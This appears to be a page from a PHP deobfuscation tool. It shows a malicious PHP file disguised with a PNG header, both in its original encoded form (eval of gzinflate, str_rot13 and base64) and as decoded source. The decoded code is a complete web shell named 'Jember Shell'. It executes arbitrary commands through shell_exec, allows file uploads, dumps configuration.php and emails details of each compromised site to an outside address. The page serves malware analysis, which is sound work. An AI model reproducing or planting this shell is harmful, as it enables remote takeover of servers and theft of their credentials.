Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
?PNG <?php /********************************************/ eval(gzinflate(str_rot13..
Decoded Output download
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Target ditemukan
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/plugins/user/kediri.phtml";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Jember Shell</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." Succes :p "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}
if(isset($_GET['baca'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}Did this file decode correctly?
Original Code
?PNG
<?php
/********************************************/
eval(gzinflate(str_rot13(base64_decode('rUl6QuM4EP58VfwH46uURwtW2dNWCChNDsLS00+5ptwXQESauK12ElS2A9tQ/PebsZO+LAvHnrZPIp1sc+aZx5NkmZRPU5KVT3deWdxB+2Bmg4+Ju8WVb9p6Um4Qhr3+5Y0ziu/jmWbXYf/ytLnRbeCK61FHhSZd0oGg1iMbwSMGDP4OBjf0fDi8is774ZDeoZsX93juTvDXaBAOo+tOzwJTIp0Dgg5wOW6apFyzvJrFBbktMDcmoIhG8ZjlnZQB9hMvawRg105wlIuUOYsGFsA2bHcplkeS6znkD4/PguiifxpAgv7ZGT1r3txgmW9ioC4BcVczTDLZhYpGofR1XsQ5ZhctOfZ/Z3xtOgCd6qbZWQsJVl4LGgQX/W6wEpTHPGbpvZgJPJEZl53O3qdsPBXCWITHRrpaqBGLYdPzS/GM/IEnA09atS73fb9EC2d4GrotbUokcfKBIZW6j9uCgLUHFBOgCOaGLTXcX5w8Ue6CcCnXC8SHD1MnPmmb6fkcDGKcJBMFw8nBwUSikglbHQUnPBn0robRTO9YY2x8EThzHEWmNCfdJeq0f2V9EVwOo06/P2fuPOqXTDXhhfIr6MefsZRY7pVGnXQ4J5JMoXq9em8TtnoDP2SI9t81UftpiACUWQWhh5rrjB39yfIRnFU4ckxp6Fvb4VUeIf8aOBbwhin+D+t+JInI4Jx+3TMfAB5EYkTNo4f+dRHcAnCEsmepWD11LgIDKKKN0Xp7tP3eGtcQAPQrnmlapnwOj5BuRMKjcbJnQb5ortJtSj08NihV4SjLqDKH2F5CM66KUWZEkPIRihGcquQxte9LgiY7g62qq7SUpUMu+rcd3zEjdVxb6MtLblztnV1nVaYrTBC0awBhzvR2xWHmu7Z/r8Tt7Y/UAPTrUupPKJkDksmc5LhPQOkrXKokNhpnKT1tW9ATkedkkTYCHvKirDTR85JoqXNfNSWoZJcmbFfXvW41yvnSYvND8hB0lfk+A7yPzI6cg2imDA7IpMirWfMyltrgadJLxw3zph3s5j9NuC4zEafkjHTMtOEj+lI3Rp6mrKjZKst9DTCG+NqNs4lfdl1mz3N7k8UlezTR+3GVxFd+R9NT7/5e1ynYIz5DknGxRV0drwVLkrWPjvRPW9vwmrwrWBUVu2R5Y7NJKxMBKxBeg2X5Dnm1DI8mpqYDTkLGbtYw7t3wxnYkZO4AdEBzDmbxwCKbnaURAtzvhui8jHkY7NoFG8+Uqcn8lEfYrd0jzUfAfclF3AvPxK5gsuYPqyRuVxENJu/bZ7C8rJ/sl4QekHTz0r3Qup79U3lrSIxltTNCzZVIYrdFstVO+q0ZpI75wM5JuO4j9pUlLnMyy83Oko+xZ3rDrF+k+ZKCqDksHf+XgmuTw0/OH8rqcYrscbHzV+KXvxFTZBIveyvG0BuOUHHuLoiHu1jBSOb58Id+PqlxjHgErwnzg8WwNLFL418=')))); ?>
Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 8d0d828535b01460a0d790fd90632fdb |
| Eval Count | 1 |
| Decode Time | 83 ms |